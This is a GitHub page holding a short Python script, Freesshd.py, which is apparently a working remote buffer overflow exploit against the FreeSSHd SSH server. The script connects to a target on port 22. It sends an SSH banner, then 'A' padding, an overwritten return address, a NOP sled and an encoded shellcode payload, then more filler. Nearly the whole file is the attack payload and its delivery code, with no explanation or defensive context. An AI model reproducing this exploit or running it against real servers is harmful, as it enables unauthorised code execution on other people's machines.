-
Notifications
You must be signed in to change notification settings - Fork 0
/
Freesshd.py
executable file
·53 lines (45 loc) · 2.12 KB
/
Freesshd.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/usr/bin/python
import socket, sys
import time
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((sys.argv[1],22))
buffer = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" \
"\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
buffer += "A"*1055
#The return address
buffer += "\x0a\xaf\xd5\x77"
buffer += "AAAA" #not necessary
#the ESP
buffer += "\x90"*20
buffer +=("\xba\x67\x49\xa4\xac\xda\xc2\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
"\x56\x83\xc3\x04\x31\x53\x0f\x03\x53\x68\xab\x51\x50\x9e\xa2"
"\x9a\xa9\x5e\xd5\x13\x4c\x6f\xc7\x40\x04\xdd\xd7\x03\x48\xed"
"\x9c\x46\x79\x66\xd0\x4e\x8e\xcf\x5f\xa9\xa1\xd0\x51\x75\x6d"
"\x12\xf3\x09\x6c\x46\xd3\x30\xbf\x9b\x12\x74\xa2\x53\x46\x2d"
"\xa8\xc1\x77\x5a\xec\xd9\x76\x8c\x7a\x61\x01\xa9\xbd\x15\xbb"
"\xb0\xed\x85\xb0\xfb\x15\xae\x9f\xdb\x24\x63\xfc\x20\x6e\x08"
"\x37\xd2\x71\xd8\x09\x1b\x40\x24\xc5\x22\x6c\xa9\x17\x62\x4b"
"\x51\x62\x98\xaf\xec\x75\x5b\xcd\x2a\xf3\x7e\x75\xb9\xa3\x5a"
"\x87\x6e\x35\x28\x8b\xdb\x31\x76\x88\xda\x96\x0c\xb4\x57\x19"
"\xc3\x3c\x23\x3e\xc7\x65\xf0\x5f\x5e\xc0\x57\x5f\x80\xac\x08"
"\xc5\xca\x5f\x5d\x7f\x91\x37\x92\xb2\x2a\xc8\xbc\xc5\x59\xfa"
"\x63\x7e\xf6\xb6\xec\x58\x01\xb8\xc7\x1d\x9d\x47\xe7\x5d\xb7"
"\x83\xb3\x0d\xaf\x22\xbb\xc5\x2f\xca\x6e\x49\x60\x64\xc0\x2a"
"\xd0\xc4\xb0\xc2\x3a\xcb\xef\xf3\x44\x01\x86\x33\x8b\x71\xcb"
"\xd3\xee\x85\xfa\x7f\x66\x63\x96\x6f\x2e\x3b\x0e\x52\x15\xf4"
"\xa9\xad\x7f\xa8\x62\x3a\x37\xa6\xb4\x45\xc8\xec\x97\xea\x60"
"\x67\x63\xe1\xb4\x96\x74\x2c\x9d\xd1\x4d\xa7\x57\x8c\x1c\x59"
"\x67\x85\xf6\xfa\xfa\x42\x06\x74\xe7\xdc\x51\xd1\xd9\x14\x37"
"\xcf\x40\x8f\x25\x12\x14\xe8\xed\xc9\xe5\xf7\xec\x9c\x52\xdc"
"\xfe\x58\x5a\x58\xaa\x34\x0d\x36\x04\xf3\xe7\xf8\xfe\xad\x54"
"\x53\x96\x28\x97\x64\xe0\x34\xf2\x12\x0c\x84\xab\x62\x33\x29"
"\x3c\x63\x4c\x57\xdc\x8c\x87\xd3\xec\xc6\x85\x72\x65\x8f\x5c"
"\xc7\xe8\x30\x8b\x04\x15\xb3\x39\xf5\xe2\xab\x48\xf0\xaf\x6b"
"\xa1\x88\xa0\x19\xc5\x3f\xc0\x0b")
buffer += "A" * 23000
buffer += "\r\n"
print sock.recv(1024)
sock.send(buffer)
time.sleep(3)
sock.close()